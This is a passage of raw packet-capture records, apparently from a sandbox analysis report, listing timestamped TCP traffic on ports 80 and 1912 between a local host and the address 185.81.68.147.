                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.078829050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.079051018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.079169989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.079782963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.079941988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.080786943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.081083059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.081197977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.081923962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.081971884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.082006931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.082631111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.082679033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.082715034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.083544016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.083589077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.083627939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.084456921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.084506989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.084517002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.084850073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.085441113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.085619926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.085696936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.086306095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.086412907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.086462021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.087116003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.087241888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.087285995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.088064909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.088363886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.088407993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.089237928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.089266062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.089314938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.089941025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.090045929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.090084076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.090795040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.090909958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.090949059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.091731071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.091814041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.091851950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.092639923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.092751026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.092807055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.093909979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.094002008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.094042063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.094791889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.094842911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.094881058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.095371008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.095474958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.095511913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.096234083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.117789030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.117913008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.117932081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.117950916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.118055105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.118083954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.118933916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.119119883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.119663954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.119944096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.119959116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.119980097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.120903015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.120944023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.121081114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.121889114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.121942043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.122045040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.122704983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.122742891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.122909069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.123594999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.123631954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.123734951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.124535084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.124572992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.124685049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.125569105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.125624895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.125720024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.180876017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.244051933 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.254594088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.254615068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.254867077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.255065918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.255258083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.255352020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.255944967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.256103992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.256200075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.256752968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.256932974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.257024050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.257721901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.257873058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.257968903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.258667946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.258821964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.258944988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.259623051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.259787083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.259881973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.260453939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.260617971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.260710001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.261526108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.261543989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.261650085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.262511969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.262528896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.262667894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263459921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263478994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263498068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263514996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263533115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263550043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263608932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263657093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263868093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.263977051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.264072895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.264796972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.264904976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.265002966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.265791893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.265851974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.265947104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.266685963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.266809940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.266904116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.267620087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.267810106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.267910004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.268552065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.268649101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.268748045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.269357920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.269475937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.269570112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.270612001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.270721912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.270824909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.271461964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.271567106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.271658897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.272295952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.272365093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.272411108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.273242950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.273349047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.273396015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.274588108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.274734020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.274784088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.275594950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.275728941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.275775909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.276671886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.276798010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.276899099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.277483940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.277631044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.277723074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.278263092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.278341055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.278387070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.278944969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.279027939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.279071093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.279808044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.279886961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.279933929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.280632019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.280750036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.280795097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.281400919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.281527042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.281573057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.282212973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.282341957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.282383919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.283207893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.283277988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.283332109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.284080982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.284163952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.284209967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.285017967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.285118103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.285160065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.285921097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.286003113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.286052942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.286835909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.286917925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.287015915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.287794113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.287893057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.287940025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.288681984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.288775921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.288824081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.289768934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.289901018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.289952040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.290661097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.290740013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.290782928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.291435957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.301772118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.301881075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.301889896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.302081108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.302124977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.302175999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.303034067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.303078890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.303205013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.303913116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.303958893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.304012060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.304847956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.304893017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.304943085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.305805922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.305815935 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.305862904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.305896997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.306695938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.306736946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.307080030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.307785988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.307837963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.308176994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.308814049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.308859110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.308940887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.309696913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.309745073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.309792995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.352678061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.445844889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.445939064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.446002960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.446134090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.446141005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.446187019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.446486950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.446578026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.446618080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.447124958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.447235107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.447272062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.448080063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.448179007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.448221922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.448913097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.449045897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.449086905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.449757099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.449872017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.449914932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.450740099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.450829029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.450876951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.451608896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.451730013 CET8049709185.81.68.147192.168.2.8
